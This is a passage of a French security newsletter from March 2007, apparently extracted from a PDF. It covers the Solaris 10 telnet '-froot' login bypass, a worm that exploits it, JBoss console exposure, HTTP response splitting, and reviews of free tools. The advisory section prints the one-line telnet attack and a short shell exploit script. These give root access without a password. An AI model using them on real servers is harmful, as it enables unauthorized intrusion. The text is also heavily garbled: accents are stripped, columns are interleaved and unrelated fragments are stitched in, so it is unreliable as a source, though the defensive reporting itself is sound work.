Tous les serveurs Sun Solaris 10, qui im- Solaris, souvent utilis pour sa robustesse, a
plmentaient le service Telnet, ont t tou- donc pris un sacr coup.
chs par une vulnrabilit surprenante. Nous vous rappelons que le service Telnet ne
doit plus tre implment dans un environne-
En effet, une simple commande Telnet ment scuris. Il est important que les adminis-
(telnet -l "-froot" IP) permettait un utilisateur doutrepasser trateurs se tournent vers SSH, connu pour ses gages de
les mesures de scurit. Il pouvait ainsi obtenir, distance, confidentialit et dintgrit.
les droits de nimporte quel utilisateur (root) sur le systme
concern et ce, sans mme saisir le moindre mot de passe. Un programme a rapidement t dvelopp. En connaissant
simplement le nom dun utilisateur, le pirate obtient un accs
Cette vulnrabilit nous ramne 13 ans en arrire lpo- directe au serveur avec le compte pirat. Voici le code
que o la totalit des attaques tait mene en ligne de source de cet exploit dvelopp en langage Shell :
commandes, sans payload ni scripts complexes.
Le systme AIX (IBM) tait dailleurs sujet la mme vuln-
CODE ...
rabilit en 1994
Dtaillons cette vulnrabilit pour le moins trange.
La commande telnet -l "-froot" IP utilise loption l qui va echo ""

chercher la variable denvironnement USER et lenvoyer au echo "SunOS 5.10/5.11"
programme login sur le systme distant. if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
Or ici, nous passons lutilisateur -froot en argument. Ce echo "./sunos localhost bin"
paramtre est donc envoy au programme login qui va exit
interprt -froot comme loption froot. Comme lindi- fi
que le man de login. echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
Man login :
-f : The -f option is used when a user name is specified
to indicate that proper authentication has already been
done and that no password need be requested. This Code de lexploit Solaris pour la faille Telnet
option may only be used by the super-user or when an
already logged in user is logging in as
themselves.
Le programme in.telnetd est lanc par lutilisateur root sur

le systme cibl. Il a donc le droit dutiliser loption f root
qui authentifie lutilisateur root sans avoir besoin du mot
de passe.
Certains diront quil est impossible dutiliser cette faille si

lutilisateur root na pas le droit de se connecter depuis un
systme distant (/dev/console et/etc/default/login). Pourtant,
cette vulnrabilit peut tre exploite de la mme manire
avec un nom dutilisateur valide (bin, nom de famille de
ladministrateur)

LACTU SCU Mars 2007 En utilisant quelques astuces de recherche sur le moteur
Google, un pirate peut identifier les serveurs concerns par
INFO VIRUS
cette vulnrabilit et obtenir des informations sensibles sur
la configuration de Jboss, causer un dni de service en
changeant certains paramtres et invoquer certaines fonc-
tions.
La faille Telnet rapidement exploite
Peu de temps aprs la publication de

la faille Telnet, un ver pour Solaris
venait d'tre identifi. Ce dernier
baptis 'Unix/Froot A' ou 'Wanuk' ex-
ploitait activement une faille dcou-
verte dans Solaris 10 et se manifes-
tait par laffichage de messages of-
fensants et dimages de dindons par-
lants.
Accs la console jmx
Une fois l'ordinateur contamin, le

virus scannait le rseau local la
recherche de cibles potentielles. Ds
que le dmon telnet tait identifie
sur une machine du rseau, le ver es-
sayait d'en prendre le contrle avec
la faille 'froot'.
Accs la console web
Lerreur tait lie un problme de configuration. Les con-

soles Jmx et Web de management ne sont pas correcte-
ment scurises par dfaut.
Les serveurs JBOSS galement cibls
Vous trouverez tous les conseils utiles la scurisation de
Continuons notre petit tour dhorizon du mois avec les failles
la console Jboss ladresse suivante:
ddies aux serveurs. Une autre nouvelle publie sur un
forum a certainement glac deffroi certains RSSI. En effet,
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxCons
certaines fonctionnalits de l'application Jboss taient ac-
ole
cessibles par nimporte quel internaute connaissant
ladresse magique.
Liste des serveurs vulnrables

Liste des outils bien utiles :
LACTU SCU Mars 2007
OUTILS LIBRES
Chaque mois, nous vous
prsentons les outils li-
bres qui nous paraissent
utiles et pratiques.
Les logiciels abords
sont varis : utilitaires
de dveloppement, scuri-
t et autres programmes
utiles, voir indispensa-
bles, en entreprise.
Ce mois-ci, nous avons

choisi de prsenter les
logiciels suivants :
Google Desktop : outil
de recherche
Key Pass Password Safe :
gestionnaire de mot de
passe
Vmware converter : vir-
tualisation de machines
physiques
TestDisk : outils de r-
cupration de donnes
Vous trouverez la fin

de cette section un ta-
bleau rcapitulatif des
versions de tous les lo-
giciels prsents lors
des prcdents numros
dActu Scurit.
XMCO | Partners

LACTU SCU Mars 2007
Google Desktop
Recherche locale de fichiers/Informations en temps
rel
Version actuelle 5.0
Utilit
Type Utilitaire
Description Google Desktop est, comme son nom lindique, un logiciel dvelop-
p par la socit Google. Il a pour but de faciliter la recherche de
fichiers sur son ordinateur via linterface Web la plus connue de la
Toile. Vous pourrez ainsi retrouvez toutes les informations de votre
PC (e-mails de tous les clients utiliss).
Cet utilitaire permet galement de configurer une side-bar qui ap-

porte en temps rel des informations configurables (flux RSS, bloc
notes, diaporamas de photos, informations diverses, E-mail, plu-
gin).
Capture dcran
Tlchargement Google Desktop est disponible ladresse suivante :

http://desktop.google.com/fr/?utm_campaign=fr&utm_source=fr-ha-e
mea-fr-google&utm_medium=ha&utm_term=google%20desktop
Scurit de loutil Une faille de scurit importante a t dcouverte au mois de janvier
(voir chapitre prcdent page 11). Cette dernire permettait un
pirate de prendre le contrle total dun systme implmentant Goo-
gle Desktop. La vulnrabilit a maintenant t corrige.
Avis XMCO Google Desktop est un outil pratique. Contrairement la recher-

che classique de Windows, Google indexe les e-mails de tous les
clients mail du march. Par ailleurs la side-bar est pratique et
peut implmenter de nombreux plugins disponibles gratuitement
sur le site de Google.

LACTU SCU Mars 2007
Key Pass Password Safe

Gestionnaire de mots de passe
Utilit
Type Logiciel Scurit

Description Key Pass Password Safe est un outil de gestion de mots de passe.
La plupart des utilisateurs choisissent le mme mot de passe pour
leurs applications et leurs accs confidentiels. Cette habitude consti-
tue aujourdhui un problme de scurit majeur que rsout Key Pass
Password Safe. Ce logiciel permet de sauvegarder tous vos mots de
passe dans une base de donnes scurise par une pass phrase.
Il vous suffit alors de retenir un seul mot de passe (trs long de pr-
frence) et vous deviendrez le seul pouvoir consulter tous vos
mots de passe en scurit.
Capture dcran
Tlchargement Key Pass Password Safe est un outil libre disponible sur toutes les
plates-formes(Windows, Linux, Mac OS X) et pour PalmOS/Pocket
PC ladresse suivante:
http://keepass.info/download.html
Scurit de loutil Aucune faille de scurit n a t identifie
Avis XMCO Key Pass est un trs bon outil de sauvegarde de mots de passe. Il
vous permet de grer un grand nombre de donnes de manire s-
curise (base de donne chiffre par une clef solide).

LACTU SCU Mars 2007
Vmware Converter
Conversion de machines physiques
Utilit
Type Logiciel Systme

Description Aprs vous avoir prsent VmWare Player, un outil de virtualisation
gratuit, il nous parat indispensable de dvoiler un autre utilitaire qui
peut savrer pratique: VmWare Converter. Ce logiciel permet en
quelques clics de convertir une machine physique en machine vir-
tuelle. En dautres mots, votre systme dexploitation peut tre trans-
form en fichier qui sera lu par VmPlayer pour constituer une ma-
chine virtuelle.
Capture dcran
Tlchargement Ce logiciel disponible uniquement sur Windows est mis disposition

ladresse suivante:
http://www.vmware.com/download/converter/
Scurit de loutil Aucune faille na t publie ce jour.
Avis XMCO Linterface de Vmware Converter est trs simple. Il intgre un assis-
tant qui vous guide pas pas. Loutil peut mme grer des fichiers
divers (image Ghost ou Virtual PC). Le processus de conversion est
un peu long mais lutilitaire a lavantage dtre gratuit!

LACTU SCU Mars 2007
TestDisk
Rcupration de donnes
Version actuelle
Utilit
Type Logiciel Systme

Description Chaque utilisateur a dj t confront une erreur de disque dur,
de partitions systme. Les virus, toujours de plus en plus nombreux,
sont souvent la cause de problme divers difficilement rparables
sous Windows. Test Disk est un outil qui permet de rcuprer faci-
lement les partitions perdues, de rparer la table des partitions cor-
rompues.
Capture dcran
Tlchargement Ce logiciel est disponible pour Windows, Mac OS X et Linux

ladresse suivante:
http://www.cgsecurity.org/wiki/TestDisk_Download
Scurit de loutil Aucune faille na t publie ce jour.
Avis XMCO Cet utilitaire savrera pratique et mme essentiel pour les pro-
blmes rencontrs sur des partitions systme.

LACTU SCU Mars 2007
Suivi des versions

Version actuelle des outils libres prsents dans les
numros prcdents
NOM DERNIRE VERSION DATE LIEN
Debian Sarge Version stables 3.1 19/04/2006 http://www.debian.org/CD/netinst/

r2
Snort 2.6.13 17/02/2006 http://www.snort.org/dl/
MySQL 5.2.3-falcon-alpha http://dev.mysql.com/downloads/mysql/5.2.html
5.1.16-bta 02/2007 http://dev.mysql.com/downloads/mysql/5.1.html
5.0.37 02/2007 http://dev.mysql.com/downloads/mysql/5.0.html
4.1.22 http://dev.mysql.com/downloads/mysql/4.1.html
Apache 2.2.4 11/07/2007 http://httpd.apache.org/download.cgi
2.0.59 http://httpd.apache.org/download.cgi
1.3.37 http://httpd.apache.org/download.cgi
Nmap 4.2 11/2006 http://www.insecure.org/nmap/download.html
Firefox 2.0.0.3 03/2007 http://www.mozilla-europe.org/fr/products/firefox/
Thunderbird 1.5.0.10 02/2007 http://www.mozilla-europe.org/fr/products/thunderbird/
Spamassassin 3.1.7 10/2006 http://spamassassin.apache.org/downloads.cgi?update

=200603111700
Putty 0.59 02/2007 http://www.chiark.greenend.org.uk/~sgtatham/putty/do

wnload.html
ClamAV/ClamAV 0.90.1 11/12/2006 http://www.clamav.net/stable.php#pagestart
Ubuntu 6.10 Edgy Eft 10/2006 http://www.ubuntu-fr.org/telechargement

Postfix 2.3 06/06/2006 http://www.postfix.org/download.html
Squid Stable 14 2.6 01/07/2006 http://www.squid-cache.org/Versions/v2/2.5/
Filezilla 2.2.31a 03/2007 http://filezilla.sourceforge.net/
OpenSSH 4.6/4.6p1 7/11/2006 http://www.openssh.com/
Search & Destroy 1.4 http://www.safer-networking.org/fr/download/index.htm

l
ARPWatch ftp://ftp.ee.lbl.gov/arpwatch.tar.gz

LACTU SCU Mars 2007
GnuPG 1.4.7 02/2007 http://www.gnupg.org/(fr)/download/
BartPE 3.1.10a 6/10/2003 http://severinterrier.free.fr/Boot/PE-Builder/
TrueCrypt 4.2a http://www.truecrypt.org/downloads.php
Back-Track 2.0 10/2006 http://www.remote-exploit.org/backtrack_download.ht

ml
MBSA 2.1.1 02/2007 http://www.microsoft.com/technet/security/tools/mbsa

home.mspx
Ps-Exec 1.82 05/03/2007 http://www.microsoft.com/technet/sysinternals/utilities/

psexec.mspx
Helios v1.1a 6/06/2006 http://helios.miel-labs.com/2006/07/download-helios.ht

ml
Opera 9.10 04/02/2007 http://www.opera.com/download/
Internet Explo- IE 7 http://www.microsoft.com/france/windows/downloads/i

rer e/getitnow.mspx
Outils de sup- 1.26 13/02/2007 http://www.microsoft.com/france/securite/outils/malwar

pression de lo- e.mspx
giciels mal-
veillants
F-Secure Blacklight Beta http://www.f-secure.com/blacklight/try_blacklight.html

Blacklight
Writely Writely beta http://www.writely.com
Nessus 3.0.5 01/2007 http://www.nessus.org/download
Windows Servi- 3.5 http://www.microsoft.com/france/windows/sfu/decouvr

ces for Unix ez/detail.mspx
VNC 4.1.2/4.2.8 http://www.realvnc.com/cgi-bin/download.cgi
Vmware Player 1.0.3 11/06/2006 http://www.vmware.com/download/player/
Sync Toy 1.4 http://www.microsoft.com/downloads/details.aspx?Fam

ilyID=E0FC1154-C975-4814-9649-CCE41AF06EB7&dis
playlang=en
MySQL Front 3.0 http://www.clubic.com/lancer-le-telechargement-9175-0

-mysql-front.html
Winscp 3.8.2 http://winscp.net/eng/download.php
Lcc v-2007-02-28 28/02/2007 http://www.q-software-solutions.de/downloaders/get_n

ame
Cain 4.6 02/2007 http://www.oxid.it/cain.html

LACTU SCU Mars 2007
RSS Bandits 1.3.0.42 25/11/2006 http://www.rssbandit.org/
Netmeeting
OpenOffice 2.1 http://www.download.openoffice.org/index.html
Pspad 4.5.2 20/10/2006 http://pspad.com/fr/download.php
Cygwin 1.5.24-2 01/2007 http://www.cygwin.com
Aircrack 0.7 02/2007 http://www.aircrack-ng.org/doku.php#download
PDFCreator 0.9.3 http://www.pdfforge.org/products/pdfcreator/download
7-zip 4.42 14/05/2006 http://www.7-zip.org/fr/download.html
PowerToys 07/2002 http://www.microsoft.com/windowsxp/downloads/powe

rtoys/xppowertoys.mspx
Supercopier 2 beta 1.9 09/01/2007 http://supercopier.sfxteam.org/modules/mydownloads/
Active Python/ 2.4.312/5.8.8.820 http://www.activestate.com/products/activepython/

Perl http://www.activestate.com/Products/ActivePerl/
AVG 7.5 http://www.avgfrance.com/doc/31/fr/crp/0
Extensions http://extensions.geckozone.org/Firefox/
Firefox
FeedReader 3.08 24/01/2007 http://www.feedreader.com/download


Actu Secu Mars2007

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Actu Secu Mars2007

Transféré par

Droits d'auteur :

Formats disponibles

LACTU SCU 12 MARS 2

Numro 12 : le chiffre magique...

Top 5 des virus

Dossier........................................................................................2 Attaques et alertes majeures............................................10

Etat de lart ..................................................................................5 Outils Libres.......................................................................14

XMCO Partners - 2007 [1]

Les Phone Home : un logiciel espion sur votre ordinateur

Le cas de Microsoft, largement relay dans la presse sp-

XMCO Partners - 2007 [2]

Mars 2007 : aucun changement lhorizon...

Nouveau rebondissement dans cette affaire, le 6 Mars

Rsum des pisodes prcdents: avril 2006 le

Revenons en avril 2006. Le scandale clate au grand jour.

Le programme fait alors lobjet dune procdure en justice.

Le logiciel de Microsoft s'avrera tre un spyware puissant

Un texte avait bel et bien t prvu pour signaler cet

XMCO Partners - 2007 [3]

Haut les mains, vous tes cerns !

Une fois lauthentification ralise, lutilisateur est autoris

Du point de vue de la scurit, la confidentialit des don-

[1] Article du journal Heise Security

[2] Le cas Itunes

XMCO Partners - 2007 [4]

ETAT DE LART ponse Splitting

Ce mois-ci, nous allons

Avant de nous lancer dans le dtail des techniques datta-

XMCO Partners - 2007 [5]

Requte : http://www.xmcolabs.com/redir.php?id=menu http://www.xmcolabs.com/redirect.php?id=menu

En changeant la fin de cette url, avec linsertion de caract-

La requte envoye (que nous nommerons X) est donc

HTTP/1.1 302 Found GET

Le serveur web devrait renvoyer thoriquement la rponse

reprend le paramtre Menu de notre requte et le reco-

Cette technique a t baptise HTTP Response Splitting .

XMCO Partners - 2007 [6]

Cache Poisonning tualit...

Imaginons que deux requtes soient envoyes dans une 14

dune page cre par le pirate. 6

Cette rponse verte peut aussi tre renvoye par le serveur 2 2

2004 2005 2006 2007

XMCO Partners - 2007 [7]

LA PREUVE PAR LEXEMPLE...

Etape 1: Des requtes sont envoyes au serveur web

Lattaquant envoie une requte X

La victime envoie en mme temps

Lattaquant envoie une requte Z

Une rponse x pour la requte X.

Une rponse y pour la requte Y.

Une rponse z pour la requte Z.

La rponse x est divise en deux

X1 est destine lattaquant

X2 est destine la victime

Y est destine lattaquant

La dernire rponse Z est rejete.

Rsultat: lattaquant reoit la page qui tait destine la victime.

XMCO Partners - 2007 [8]

XMCO Partners - 2007 [9]

LES ATTAQUES MAJEURES Ce mois de Fvrier a t

En effet, aprs une vul-

Les vulnrabilits des postes clients Voici les deux captures:

Toutes ces failles ncessitaient lintervention de lutilisa-

Internet Explorer : la cible privilgie des

Une autre vulnrabilit a t publie la fin du mois

XMCO Partners - 2007 [10]